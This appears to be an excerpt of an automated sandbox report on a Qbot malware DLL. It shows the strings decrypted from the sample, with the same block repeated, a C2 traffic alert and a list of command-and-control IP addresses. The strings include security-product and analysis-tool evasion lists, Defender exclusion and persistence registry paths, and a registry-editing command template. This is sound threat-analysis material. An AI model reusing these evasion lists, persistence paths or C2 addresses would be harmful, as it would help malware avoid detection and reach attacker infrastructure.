            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: SELECT * FROM Win32_OperatingSystem
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\mobsync.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: c:\hiberfil.sysss
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: */*
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\AtBroker.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: abcdefghijklmnopqrstuvwxyz
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: ByteFence.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: type=0x%04X
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: snxhk_border_mywnd
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: ROOT\CIMV2
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: dwengine.exe;dwarkdaemon.exe;dwwatcher.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: https
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\explorer.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: fshoster32.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: kernelbase.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: regsvr32.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %s\system32\
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\dxdiag.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Content-Type: application/x-www-form-urlencoded
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Win32_Process
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: rundll32.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: LOCALAPPDATA
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: cmd.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: APPDATA
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: select
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: .exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: mcshield.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: advapi32.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: ws2_32.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: .cfg
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: aabcdeefghiijklmnoopqrstuuvwxyyz
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Win32_Product
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: WQL
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: wininet.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: LastBootUpTime
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: S:(ML;;NW;;;LW)
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\CertEnrollCtrl.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: urlmon.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Create
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Win32_PnPEntity
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\System32\grpconv.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Initializing database...
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\System32\SearchIndexer.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: winsta0\default
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: .dat
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: WBJ_IGNORE
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: next
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\System32\AtBroker.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: wpcap.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: aaebcdeeifghiiojklmnooupqrstuuyvwxyyaz
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\sethc.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: image/pjpeg
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: fmon.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: bdagent.exe;vsserv.exe;vsservppl.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\System32\SndVol.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: vbs
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: aswhooka.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: SysWOW64
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\mspaint.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: mpr.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: image/gif
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: crypt32.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: avgcsrvx.exe;avgsvcx.exe;avgcsrva.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: ntdll.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: open
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\explorer.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: CSFalconService.exe;CSFalconContainer.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\System32\wextract.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\System32\mobsync.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\SearchIndexer.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %u.%u.%u.%u.%u.%u.%04x
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\explorer.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: SystemRoot
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: cscript.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: MBAMService.exe;mbamgui.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\System32\xwizard.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\System32\wermgr.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: AvastSvc.exe;aswEngSrv.exe;aswToolsSvc.exe;afwServ.exe;aswidsagent.exe;AvastUI.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: C:\INTERNAL\__empty
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: .dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Win32_PhysicalMemory
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: ALLUSERSPROFILE
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: image/jpeg
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: LocalLow
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: displayName
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Mozilla/5.0 (Windows NT 6.1; rv:77.0) Gecko/20100101 Firefox/77.0
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: shlwapi.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\WerFault.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: CommandLine
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: {%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: kernel32.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: SubmitSamplesConsent
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: 1234567890
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: wbj.go
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\wextract.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Win32_DiskDrive
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: vkise.exe;isesrv.exe;cmdagent.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: System32
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Name
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\System32\WerFault.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: WRSA.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: c:\\
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: reg.exe ADD "HKLM\%s" /f /t %s /v "%s" /d "%s"
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: SpyNetReporting
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: FALSE
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: aswhookx.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Packages
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: SonicWallClientProtectionService.exe;SWDash.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: application/x-shockwave-flash
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Sophos UI.exe;SophosUI.exe;SAVAdminService.exe;SavService.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: RepUx.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\System32\mspaint.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: coreServiceShell.exe;PccNTMon.exe;NTRTScan.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Winsta0
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Caption,Description,DeviceID,Manufacturer,Name,PNPDeviceID,Service,Status
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: CynetEPS.exe;CynetMS.exe;CynetConsole.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\wermgr.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %ProgramFiles(x86)%\Internet Explorer\iexplore.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: avp.exe;kavtray.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: root\SecurityCenter2
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\backgroundTaskHost.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: MsMpEng.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\System32\CertEnrollCtrl.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: userenv.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: csc_ui.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: frida-winjector-helper-32.exe;frida-winjector-helper-64.exe;tcpdump.exe;windump.exe;ethereal.exe;wireshark.exe;ettercap.exe;rtsniff.exe;packetcapture.exe;capturenet.exe;qak_proxy;dumpcap.exe;CFF Explorer.exe;not_rundll32.exe;ProcessHacker.exe;tcpview.exe;filemon.exe;procmon.exe;idaq64.exe;loaddll32.exe;PETools.exe;ImportREC.exe;LordPE.exe;SysInspector.exe;proc_analyzer.exe;sysAnalyzer.exe;sniff_hit.exe;joeboxcontrol.exe;joeboxserver.exe;ResourceHacker.exe;x64dbg.exe;Fiddler.exe;sniff_hit.exe;sysAnalyzer.exe;BehaviorDumper.exe;processdumperx64.exe;anti-virus.EXE;sysinfoX64.exe;sctoolswrapper.exe;sysinfoX64.exe;FakeExplorer.exe;apimonitor-x86.exe;idaq.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: \\.\pipe\
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: pstorec.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: NTUSER.DAT
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: from
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\System32\sethc.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: netapi32.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\System32\Utilman.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: gdi32.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: setupapi.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: SELECT * FROM Win32_Processor
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: iphlpapi.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Caption
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: CrAmTray.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: ccSvcHst.exe;NortonSecurity.exe;nsWscSvc.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Win32_ComputerSystem
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\System32\backgroundTaskHost.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %ProgramFiles%\Internet Explorer\iexplore.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: user32.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: xagtnotif.exe;AppUIMonitor.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\System32\dxdiag.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: SentinelServiceHost.exe;SentinelStaticEngine.exe;SentinelAgent.exe;SentinelStaticEngineScanner.exe;SentinelUI.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: \sf2.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\grpconv.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: egui.exe;ekrn.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Software\Microsoft
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %S.%06d
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: bcrypt.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: SELECT * FROM AntiVirusProduct
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\SndVol.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\explorer.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\Utilman.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows Defender\SpyNet
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: wtsapi32.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: t=%s time=[%02d:%02d:%02d-%02d/%02d/%d]
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\xwizard.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: shell32.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: TRUE
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Win32_Bios
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: SELECT * FROM Win32_OperatingSystem
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\mobsync.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: c:\hiberfil.sysss
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: */*
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\AtBroker.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: abcdefghijklmnopqrstuvwxyz
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: ByteFence.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: type=0x%04X
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: snxhk_border_mywnd
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: ROOT\CIMV2
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: dwengine.exe;dwarkdaemon.exe;dwwatcher.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: https
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\explorer.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: fshoster32.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: kernelbase.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: regsvr32.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %s\system32\
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\dxdiag.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Content-Type: application/x-www-form-urlencoded
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Win32_Process
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: rundll32.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: LOCALAPPDATA
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: cmd.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: APPDATA
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: select
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: .exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: mcshield.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: advapi32.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: ws2_32.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: .cfg
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: aabcdeefghiijklmnoopqrstuuvwxyyz
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Win32_Product
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: WQL
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: wininet.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: LastBootUpTime
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: S:(ML;;NW;;;LW)
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\CertEnrollCtrl.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: urlmon.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Create
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Win32_PnPEntity
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\System32\grpconv.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Initializing database...
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\System32\SearchIndexer.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: winsta0\default
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: .dat
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: WBJ_IGNORE
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: next
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\System32\AtBroker.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: wpcap.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: aaebcdeeifghiiojklmnooupqrstuuyvwxyyaz
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\sethc.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: image/pjpeg
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: fmon.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: bdagent.exe;vsserv.exe;vsservppl.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\System32\SndVol.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: vbs
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: aswhooka.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: SysWOW64
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\mspaint.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: mpr.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: image/gif
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: crypt32.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: avgcsrvx.exe;avgsvcx.exe;avgcsrva.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: ntdll.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: open
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\explorer.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: CSFalconService.exe;CSFalconContainer.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\System32\wextract.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\System32\mobsync.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\SearchIndexer.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName
            Source: 042_qbot.dll.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, 32BIT_MACHINE, DLL
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_10009E70 FindFirstFileW,FindNextFileW,15_2_10009E70

            Networking

            barindex
            Source: TrafficSnort IDS: 2404302 ET CNC Feodo Tracker Reported CnC Server TCP group 2 192.168.2.3:49714 -> 109.130.247.84:2222
            Source: Malware configuration extractorIPs: 86.173.2.12:2222
            Source: Malware configuration extractorIPs: 92.9.45.20:2222
            Source: Malware configuration extractorIPs: 100.4.163.158:2222
            Source: Malware configuration extractorIPs: 213.64.33.92:2222
            Source: Malware configuration extractorIPs: 75.98.154.19:443
            Source: Malware configuration extractorIPs: 78.192.109.105:2222
            Source: Malware configuration extractorIPs: 88.126.94.4:50000
            Source: Malware configuration extractorIPs: 70.28.50.223:2083
            Source: Malware configuration extractorIPs: 92.154.17.149:2222
            Source: Malware configuration extractorIPs: 24.234.220.88:993
            Source: Malware configuration extractorIPs: 87.252.106.39:995
            Source: Malware configuration extractorIPs: 174.4.89.3:443
            Source: Malware configuration extractorIPs: 12.172.173.82:20
            Source: Malware configuration extractorIPs: 90.29.86.138:2222
            Source: Malware configuration extractorIPs: 70.160.67.203:443
            Source: Malware configuration extractorIPs: 223.166.13.95:995
            Source: Malware configuration extractorIPs: 184.181.75.148:443
            Source: Malware configuration extractorIPs: 95.45.50.93:2222
            Source: Malware configuration extractorIPs: 201.143.215.69:443
            Source: Malware configuration extractorIPs: 64.121.161.102:443
            Source: Malware configuration extractorIPs: 2.82.8.80:443
            Source: Malware configuration extractorIPs: 188.28.19.84:443
            Source: Malware configuration extractorIPs: 81.101.185.146:443
            Source: Malware configuration extractorIPs: 79.77.142.22:2222
            Source: Malware configuration extractorIPs: 84.215.202.8:443
            Source: Malware configuration extractorIPs: 183.87.163.165:443
            Source: Malware configuration extractorIPs: 74.12.147.139:2078
            Source: Malware configuration extractorIPs: 74.12.147.139:2222
            Source: Malware configuration extractorIPs: 74.12.147.139:2222
            Source: Malware configuration extractorIPs: 74.12.147.139:2083
            Source: Malware configuration extractorIPs: 70.28.50.223:2078
            Source: Malware configuration extractorIPs: 94.204.202.106:443
            Source: Malware configuration extractorIPs: 87.221.153.182:2222
            Source: Malware configuration extractorIPs: 70.28.50.223:2087
            Source: Malware configuration extractorIPs: 24.234.220.88:990
            Source: Malware configuration extractorIPs: 2.49.63.160:2222
            Source: Malware configuration extractorIPs: 72.205.104.134:443
            Source: Malware configuration extractorIPs: 199.27.66.213:443
            Source: Malware configuration extractorIPs: 83.249.198.100:2222
            Source: Malware configuration extractorIPs: 90.104.151.37:2222
            Source: Malware configuration extractorIPs: 116.75.63.183:443
            Source: Malware configuration extractorIPs: 70.28.50.223:2078
            Source: Malware configuration extractorIPs: 117.195.17.148:993
            Source: Malware configuration extractorIPs: 77.126.99.230:443
            Source: Malware configuration extractorIPs: 45.62.70.33:443
            Source: Malware configuration extractorIPs: 24.234.220.88:465
            Source: Malware configuration extractorIPs: 203.109.44.236:995
            Source: Malware configuration extractorIPs: 75.109.111.89:443
            Source: Malware configuration extractorIPs: 161.142.103.187:995
            Source: Malware configuration extractorIPs: 77.86.98.236:443
            Source: Malware configuration extractorIPs: 147.147.30.126:2222
            Source: Malware configuration extractorIPs: 124.246.122.199:2222
            Source: Malware configuration extractorIPs: 103.123.223.133:443
            Source: Malware configuration extractorIPs: 180.151.19.13:2078
            Source: Malware configuration extractorIPs: 176.142.207.63:443
            Source: Malware configuration extractorIPs: 12.172.173.82:32101
            Source: Malware configuration extractorIPs: 103.140.174.20:2222
            Source: Malware configuration extractorIPs: 70.50.83.216:2222
            Source: Malware configuration extractorIPs: 12.172.173.82:465
            Source: Malware configuration extractorIPs: 38.2.18.164:443
            Source: Malware configuration extractorIPs: 93.187.148.45:995
            Source: Malware configuration extractorIPs: 70.64.77.115:443
            Source: Malware configuration extractorIPs: 12.172.173.82:21
            Source: Malware configuration extractorIPs: 70.49.205.198:2222
            Source: Malware configuration extractorIPs: 27.0.48.233:443
            Source: Malware configuration extractorIPs: 12.172.173.82:50001
            Source: Malware configuration extractorIPs: 83.110.223.61:443
            Source: Malware configuration extractorIPs: 103.141.50.43:995
            Source: Malware configuration extractorIPs: 85.101.239.116:443
            Source: Malware configuration extractorIPs: 103.42.86.42:995
            Source: Malware configuration extractorIPs: 92.1.170.110:995
